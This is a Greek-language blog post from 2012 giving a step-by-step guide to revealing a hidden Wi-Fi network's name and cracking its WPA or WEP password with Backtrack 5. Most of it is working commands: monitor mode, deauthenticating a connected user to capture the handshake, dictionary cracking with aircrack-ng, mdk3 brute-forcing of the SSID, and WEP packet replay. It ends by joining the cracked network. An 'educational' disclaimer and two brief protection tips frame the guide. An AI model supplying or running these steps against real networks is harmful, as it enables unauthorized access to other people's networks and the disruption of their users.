ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι

Δευτέρα, 9 Ιανουαρίου 2012

Πως βρισκω και σπαω ενα κρυφο ασυρματο δικτυο


Με αυτο τον οδηγο θα μπορειτε να βρειτε το ονομα απο ενα κρυφο ασυρματο δικτυο και τον κωδικο(δεν ευθυνομαι για κακοβουλη χρηση του σε ξενα δικτυα καθως ειναι παρανομο να μοιραζεσαι το δικτυο χωρις την συγκαταθεση του ιδιοκτητη)


Τι θα χρειαστειτε;

1.Backtrack 5 R1

  • Υπαρχουνε 2 τροποι
  • με το aireplay-ng και με το mdk3
Aireplay-ng (αν υπαρχει καποιος ηδη συνδεδεμενος)
  • οταν το ψαξουμε με το wicd network manager θα μας το εμφανισει ετσι 

  • ανοιγουμε ενα τερματικο και γραφουμε 
  • airmon-ng start wlan0
  • airodump-ng mon0 και οταν δουμε με ονομα <length:  6>δλδ εμενα το ονομα ειναι 6 γραμματα αν λεει  <lenght 3> ειναι 3 κτλ.
  • airodump-ng -w kryfo --bssid 00:1F:9F:8E:53:9B -c 1 mon0
  • οπου 
  • -w το ονομα που θα αποθηκευοντε οι πληροφοριες
  • --bssid η mac address του ασυρματου δικτυου
  • -c το καναλι που εκπεμπει το δικτυο
  • βαλαμε το airodump-ng να ακουει συγκεκριμενα σε αυτο το δικτυο
  • αν δουμε καποιον station συνδεδεμενο τοτε γραφουμε
  • aireplay-ng -0 4 -a 00:1F:9F:8E:53:9B -c 00:34:45:45:45:34 mon0
  • οπου 
  • -0 deauthentication ποσες φορες θα κανουμε
  • -a η mac address του δικτυου
  • -c η mac address του χρηστη(station)
  • οταν πιασουμε το handshake θα μας εμφανισει και το ονομα του δικτυου
  • οποτε μετα μπορουμε να συνεχισουμε το σπασιμο του δικτυου
  • για wpa απλα εφοσον εχουμε πιασει το handshake απλα γραφουμε την εντολη aircrack-ng /root/kryfo*.cap -w /root/lexika/lexiko.txt 
  • οπου 
  • -w στο φακελο οπου εχετε το λεξικο σας
Mdk3
  • γραφουμε σε ενα τερματικο airmon-ng start wlan0 *αν δεν το εχουμε ξεκινησει απο πριν
  • airodump-ng mon0 ωστε να δουμε το bssid και το καναλι του δικτυου μετα το σταματαμε με ctrl+c και παλι airodump-ng -w * --bssid * -c * mon0
  • και ανοιγουμε ενα αλλο τερματικο και γραφουμε
  • mdk3 mon0 p -b a -c 1 -t 00:1F:9F:8E:53:9B -s 1000
  • οπου p -b ειναι το σπασιμο με brutalforce για το δικτυο
  • -c το καναλι
  • -b a για ολους τους χαρακτηρες
  • -b u για κεφαλαια γραμματα
  • -b l για μικρα γραμματα
  • -b n για αριθμους
  • -t η mac address του δικτυου
  • -s ποσα πακετα θα στελνουμε (καλυτερα μην χρησιμοποιησετε αυτη την επιλογη γιατι σε ορισμενες καρτες δεν δουλευει)
  • * -f αν θελετε να κοιταει σε αρχειο.txt για τα ονοματα
  • θα σας δειξει και αλλα δικτυα που ειναι στο καναλλι  απλα αφηστε το μεχρι να τελειωσει και θα σας εμφανισει το ονομα οπως εδω

  • για wep  εχουμε ξεκινησει το airodump-ng στο συγκεκριμενο δικτυο οπως πανω γραφουμε σε ενα τερματικο aireplay-ng -1 0 -a bssid mon0
  • μετα aireplay-ng -3 -b bssid mon0 
  • *(bssid = mac address του δικτυου)
  • οταν φτασουν τα πακετα πανω απο 5000
  • ανοιγω ενα αλλο τερματικο και γραφω 
  • aircrack-ng /root/kryfo*.cap
*οταν τελειωσω και βρω κωδικο και ονομα παω στο wicd Network Manager 
παταω Network -find a hidden network γραφω το ονομα βαζω και τον κωδικο στο properties και τελος

Πως θα προστατευτειτε;

1.Να εχετε wpa2 κρυπτογραφηση στο δικτυο σας με δυσκολο κωδικο και αν θελετε μπορειτε να κρυψετε το δικτυο σας ανουσιο βεβαια αλλα θα δυσκολεψει αρκετα τον αλλον ωστε να βρει ονομα και κωδικο....
2.Καντε ενσυρματη την συνδεση σας στο διαδικτυο

Δεν υπάρχουν σχόλια: